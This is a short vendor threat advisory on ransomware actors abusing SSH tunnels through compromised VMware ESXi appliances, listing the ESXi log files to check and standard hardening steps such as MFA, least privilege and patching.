What is the threat?
Cybercriminals are targeting VMware ESXi systems by leveraging compromised appliances to route traffic to their C2 infrastructure, enabling them to evade detection. Once compromised, attackers can steal data and encrypt files, effectively crippling the organization by rendering all virtual machines inaccessible.
Why is this noteworthy?
Threat actors can compromise VMware ESXi systems by exploiting admin credentials or leveraging a known security vulnerability to bypass authentication protections. Once they gain access, they set up a tunnel using SSH or other similar tools. SSH is a powerful tool that administrators use for remote management and troubleshooting. However, in the hands of attackers, it becomes a defense for persistence, lateral movement, and stealthy communication with C2 servers.
What is the exposure or risk?
Once attackers gain admin access, they can exploit the continuous operation using the minimal downtime of ESXi appliances, keeping the backdoor accessible for extended period of time, making it an ideal entry point.
To detect attacks involving SSH tunneling on ESXi appliances, organizations are advised to review the following four log files:
- /var/log/shell.log (ESXi shell activity log)
- /var/log/hostd.log (Host agent log)
- /var/log/auth.log (authentication log)
- /var/log/vobd.log (VMware observer daemon log)
What are the recommendations?
Barracuda recommends the following actions to protect your environment against this environment:
- Protect SSH access to ESXi servers with multi-factor authentication (MFA), especially for remote administrative access.
- Use complex passwords for SSH and administrative accounts, and regularly rotate credentials.
- Restrict SSH access to only necessary users and systems. Use a least-privilege model to minimize unnecessary access.
- Monitor for unusual SSH traffic or tunneling behavior, such as encrypted traffic to unexpected destinations.
- Keep ESXi servers up-to-date with the latest security patches.
- Enable detailed logging of all SSH access and system activity. Regularly review logs for unauthorized or suspicious logins, tunnel creation, or changes to the ESXi system.
References
For more in-depth information, please visit the following links:
- https://thehackernews.com/2025/01/ransomware-targets-esxi-systems-via.html
- https://vocal.media/01/ransomware-gang-exploits-ssh-tunnels-for-stealthy-v-mware-es-xi-access
- https://www.techzine.eu/news/security/128117/cybercriminals-use-ssh-tunnelling-to-access-vmware-esxi/
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
This post originally appeared on Smarter MSP.